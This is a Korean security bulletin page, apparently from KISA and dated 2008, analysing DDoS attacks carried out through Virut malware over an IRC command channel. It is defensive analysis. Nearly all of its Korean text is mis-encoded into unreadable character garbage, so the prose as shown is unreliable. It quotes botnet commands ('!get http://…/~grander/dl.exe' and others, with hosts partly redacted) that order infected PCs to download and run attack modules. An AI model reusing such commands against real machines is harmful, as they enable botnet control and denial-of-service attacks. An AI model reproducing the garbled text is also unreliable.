Home | Data Center | Contact US | Login

Á¦¸ñ Virut ¾Ç¼ºÄڵ带 ÀÌ¿ëÇÑ DDoS °ø°Ý±â¹ý ºÐ¼®
÷ºÎÆÄÀÏ 09_Virut.pdf ÀÛ¼ºÀÏ 2008-02-18 13:34:34
Virut ¾Ç¼ºÄڵ带 ÀÌ¿ëÇÑ DDoS °ø°Ý±â¹ý ºÐ¼®

1. °³ ¿ä

ÃÖ±Ù ±¹³»ÀÇ ¸î¸î ÀÎÅͳݻç¿ë PC°¡ ºÐ»ê¼­ºñ½º °ø°ÝÀ» À§ÇÑ Agent·Î ¾Ç¿ëµÇ¾î ÀϺΠ³×Æ®¿öÅ©¿¡¼­ ¾Ç¼º Æ®·¡ÇÈÀÌ ¹ß»ýÇÏ¿´´Ù. »ç°í ºÐ¼®°á°ú, Virut ¾Ç¼ºÄڵ忡 °¨¿°µÇ¾î ÀÖ´Â PC¿¡ IRC¼­¹ö¸¦ ÅëÇÏ¿© ¸í·ÉÀ» Àü´Þ, Ãß°¡ °ø°ÝÄڵ带 ´Ù¿î·Îµå․½ÇÇàÇÏ´Â ¹æ¹ýÀ¸·Î ¼­ºñ½º°ÅºÎ °ø°ÝÀ» ¼öÇàÇÏ´Â °ÍÀ¸·Î È®ÀεǾú´Ù. VirutÀº PC³»¿¡ ÀúÀåµÇ¾îÀÖ´Â ½ÇÇàÆÄÀϵ鿡 ÀÚ½ÅÀ» °¨¿°½ÃÅ°´Â ¹æ½ÄÀ¸·Î È®»êµÈ´Ù.
»ç¿ëÀÚ°¡ ÀÌ¹Ì °¨¿°µÈ ÆÄÀÏÀ» USBÀúÀå ¸Åü, ³×Æ®¿öÅ© °øÀ¯Æú´õ µîÀ» ÅëÇÏ¿© Á¤»óPC¿¡¼­ ½ÇÇà½ÃÅ°¸é ÇØ´çPCµµ °¨¿°µÇ°Ô µÈ´Ù. PC°¡ °¨¿°µÇ¸é ´Ù¼öÀÇ ½ÇÇàÆÄÀÏ¿¡ ¹ÙÀÌ·¯½º°¡ »ðÀÔµÇ°Ô µÇ¹Ç·Î °¨¿°ÀÌ ÀÇ½ÉµÉ °æ¿ì, ¹é½ÅÀ» ÅëÇÑ Àüü ÆÄÀÏ Á¡°Ë ¹× Ä¡·á¸¦ ½Ç½ÃÇÏ´Â °ÍÀÌ ÇÊ¿äÇÏ´Ù.


2. VirutÀ» ÀÌ¿ëÇÑ ºÐ»ê¼­ºñ½º °ø°Ý±â¹ý

o °ø°Ý ÀýÂ÷

°ø°ÝÀÚ´Â VirutÀ» ÀüÆÄÇÑ µÚ ÇØ´ç ¾Ç¼ºÄڵ忡 ¿ø°Ý¸í·ÉÀ» Àü´ÞÇÏ¿© °ø°Ý¸ðµâÀ» Ãß°¡·Î ¼³Ä¡ÇÏ´Â
¹æ¹ýÀ¸·Î DoS°ø°ÝÀ» ¼öÇàÇÑ´Ù.
¨ç Virut À¯Æ÷ ¡æ ¨è Virut¿¡°Ô DoS°ø°Ý¸ðµâ ´Ù¿î·ÎµåÇϵµ·Ï ¸í·ÉÀü´Þ(IRC¼­¹öÀÌ¿ë) ¡æ ¨é °ø°Ý
¸ðµâ ´Ù¿î·Îµå ¨ê ÇÇÇØ»çÀÌÆ®·ÎÀÇ DDoS °ø°Ý


o ÀýÂ÷º° »ó¼¼

¨ç Virut À¯Æ÷¹æ¹ý
°ø°ÝÀÚ´Â ÃÖÃÊ¿¡ »ç¿ëÀÚ°¡ ¸¹ÀÌ ¹æ¹®ÇÏ´Â À¥»çÀÌÆ® Àº´Ð ¶Ç´Â P2P °øÀ¯ µîÀ» ÅëÇÏ¿© VirutÀ» À¯Æ÷ÇÏ¿´À» °ÍÀ¸·Î ÃßÁ¤µÈ´Ù. VirutÀº °¨¿°µÈ PC³»ÀÇ ½ÇÇàÆÄÀϵéÀ» °¨¿°½ÃÅ°¹Ç·Î, ÃÖÃÊ À¯Æ÷ ÀÌÈÄ¿¡´Â À̵¿ÀúÀå ¸Åü ¶Ç´Â ³×Æ®¿öÅ© °øÀ¯Æú´õ µîÀ» ÅëÇÏ¿© ÀüÆĵȴÙ.

¨è VirutÀ» ÅëÇÑ DoS °ø°Ý¸ðµâ ´Ù¿î·Îµå
Virut¿¡ ¸í·ÉÀ» Àü´ÞÇÏ¿© °ø°Ý¸ðµâÀ» ¼³Ä¡ÇÑ´Ù. (°ø°ÝÀÚ´Â ¸í·ÉÀü´ÞÀ» À§ÇÏ¿© IRC [proxima.[»ý·«].pl]¸¦ ÀÌ¿ë)

- ¸í·ÉÀü´Þ »çÀÌÆ®
proxima.[»ý·«].pl, Æ÷Æ® TCP 65520, ä³Î &virut
- Àü´ÞµÇ´Â ¸í·É³»¿ë
- :* PRIVMSG msfplhjz :!get http://85.[»ý·«].2/~grander/adv735.exe
:* PRIVMSG msfplhjz :!get http://dl2.[»ý·«].com/~grander/dl.exe
:* PRIVMSG msfplhjz :!get http://85.[»ý·«].2/~grander/e.exe




< ¸í·É Àü´Þ ¿¹>


¨é VirutÀº Àü´ÞµÈ ¸í·ÉURL °æ·Î·Î Á¢¼ÓÇÏ¿© Ãß°¡ ¾Ç¼º¸ðµâÀ» ´Ù¿î·Îµå ¹× ¼³Ä¡ÇÑ´Ù. (Àü´Þ ¹ÞÀº °æ·Î Áß ¾Æ·¡ÀÇ 2°³ÀÇ URL ÆÄÀÏÀÌ DoS °ø°Ý ¸ðµâÀÌ´Ù. Ãß°¡ adv735.exeÀÇ °æ¿ì Ãß°¡ÀûÀÎ ¾Ç¼ºÄڵ带 ´Ù¿î·Îµå ¹Þ´Â °ÍÀ¸·Î È®ÀεǾú´Ù.)
¡Ø DDoS °ü·Ã °ø°ÝÄÚµå ´Ù¿î·Îµå °æ·Î
http://dl2.[»ý·«].com/~grander/dl.exe
http://85.[»ý·«].2/~grander/e.exe




dl.exe, e.exe°¡ ´Ù¿î·Îµå µÇ¸é ¡°À©µµ¿ìÆú´õ\Temp"¿¡ VRT[·£´ý].tmp ÇüÅ·ΠÀúÀå ¹× ÇÁ·Î¼¼½º·Î ·Îµù µÈ´Ù. À©µµ¿ì ½ÃÀÛ ½Ã ÀÚµ¿½ÃÀÛÀ» Çϱâ À§ÇÑ ¼³Ä¡ ±â´ÉÀÌ ¾øÀ¸¹Ç·Î, ÀçºÎÆÃÇÏ¸é ´õ ÀÌ»ó È°µ¿ÇÏÁö ¾Ê´Â´Ù.




¨ê ƯÁ¤»çÀÌÆ®¿¡ ´ëÇÑ ºÐ»ê¼­ºñ½º °ÅºÎ°ø°Ý
VRT[·£´ý].tmp°¡ ·ÎµåµÇ¸é »çÀÌÆ® http://www.[»ý·«].com¿¡ ´ëÇÑ ¼­ºñ½º°ÅºÎ°ø°ÝÀÌ ½ÃÀ۵ȴÙ.
°ø°ÝÆÐŶÀÇ ÇüÅ ¹× °¨¿°µÈ ´ÜÀÏPC°¡ ¹ß»ý½ÃÅ°´Â Æ®·¡ÇÈ ·®Àº ´ÙÀ½°ú °°ÀÌ °üÂûµÇ¾ú´Ù.

- DDoS °ø°Ý ÇüÅÂ
> °ø°Ý´ë»ó »çÀÌÆ® : http://www.[»ý·«].com
> ÇÁ·ÎÅäÄÝ ¹× Æ÷Æ®: TCP 80, 443, UDP ·£´ýÆ÷Æ®
> ÆÐŶ Size: TCP 80, 443 ¢Ñ 66 byte



- ´ÜÀÏ °¨¿°PC¿¡¼­ÀÇ Æ®·¡ÇÈ ¹ß»ý·®
°ø°ÝÆÐŶ Á¾·ù ÆÐŶ¹ß»ý ºóµµ /ÃÊ´ç ÃÊ´ç ¹ß»ý Æ®·¡ÇÈ ·®
http (TCP80) 23 ȸ 1,520 byte
https (TCP443) 4 ȸ 237 byte
UDP 9,346 ȸ 6,049,570 byte
ÃÑÇÕ 9,373 ȸ 6,051,327 byte (48Mbps)













3. À§Ç輺 ºÐ¼®

o Virut¿¡ ÀÇÇÏ¿© ¼³Ä¡µÇ´Â VRT[·£´ý].tmp °ø°Ý¸ðµâÀº ´ë·®ÀÇ Æ®·¡ÇÈÀ» À¯¹ßÇÏ´Â °ÍÀ¸·Î È®ÀεǾú´Ù.
´ÜÀÏ Å×½ºÆ® PC¿¡¼­ ÃÊ´ç 48MbpsÀÇ ´ë·® Æ®·¡ÇÈÀÌ ¹ß»ýÇÏ´Â °ÍÀ¸·Î °üÂû µÇ¾úÀ¸¹Ç·Î, »ç³» ³×Æ®¿ö Å©ÀÇ ¼­ºñ½º ÀúÇÏ¿¡ Å« ¿µÇâÀ» ¹ÌÄ¥ ¼ö ÀÖ´Ù.
o °ø°ÝÀÚ´Â ¸í·ÉÀü´ÞÀ» À§ÇÑ proxima.[»ý·«].pl µµ¸ÞÀÎÀÇ resolving IP¸¦ ¼ö½Ã·Î º¯°æÇÑ´Ù.
o È®½ÇÇÑ ¿¹¹æÀ» À§ÇÏ¿© Virut ¾Ç¼ºÄڵ忡 ´ëÇÑ ±Ùº»ÀûÀÎ Ä¡·á°¡ ¿ä±¸µÈ´Ù.

4. °¨¿°½Ã ´ëÀÀ¹æ¹ý

o Virut´Â °¨¿° PC ³»ÀÇ ¸¹Àº ½ÇÇàÆÄÀϵéÀ» °¨¿°½ÃÅ°¹Ç·Î, °¨¿°ÀÌ È®À뵃 °æ¿ì, »ç¿ëÀÚ´Â ¹é½ÅÀ¸·Î Àüü ÆÄÀϽýºÅÛ¿¡ ´ëÇÏ¿© Á¡°Ë ¹× Ä¡·áÇÏ¿©¾ß ÇÑ´Ù.
o °¨¿° ½Ã ¾Ç¼º Æ®·¡ÇÈÀÌ ¹ß»ýÇÒ ¼ö ÀÖÀ¸¹Ç·Î, ¿ÏÀüÇÑ Ä¡·á°¡ ÀÌ·ç¾îÁö±â Àü¿¡ ³×Æ®¿öÅ©·Î ºÎÅÍ °Ý¸®½ÃÅ°µµ·Ï ÇÑ´Ù.

5. ¿¹¹æ¹æ¹ý
o ³×Æ®¿öÅ© ¶Ç´Â À̵¿½Ä ÀúÀå¸Åü µî (³×Æ®¿öÅ© °øÀ¯Æú´õ ÆÄÀÏ, P2P °øÀ¯ÆÄÀÏ, À̵¿½Ä USBµî)
¿ÜºÎ·ÎºÎÅÍ Àü´ÞµÈ ÆÄÀÏÀº »ç¿ë Àü¿¡ ¹Ýµå½Ã ¹é½ÅÀ¸·Î Á¡°ËÇϵµ·Ï ÇÑ´Ù.

[ÀÚ·á: Çѱ¹Á¤º¸º¸È£ÁøÈï¿ø(KISA)]
  CentOS 5.0~5.1 :: Ä¿³Î 2.6.17~2.6.24.1 vmsplice Ä¿³Î¹ö±× ÆÐÄ¡¹æ¹ý
  ½ºÆÔ¸ÞÀÏÀ» ÅëÇÏ¿© ÀüÆĵǴ ¾Ç¼ºÄÚµå ºÐ¼®





ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ
ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ ȸ»ç¼Ò°³ °³ÀÎÁ¤º¸Ãë±Þ¹æħ ÀÌ¿ë¾à°ü À̸ÞÀÏÁÖ¼Ò ¹«´Ü¼öÁý°ÅºÎ CONTACT US IDC ¾àµµ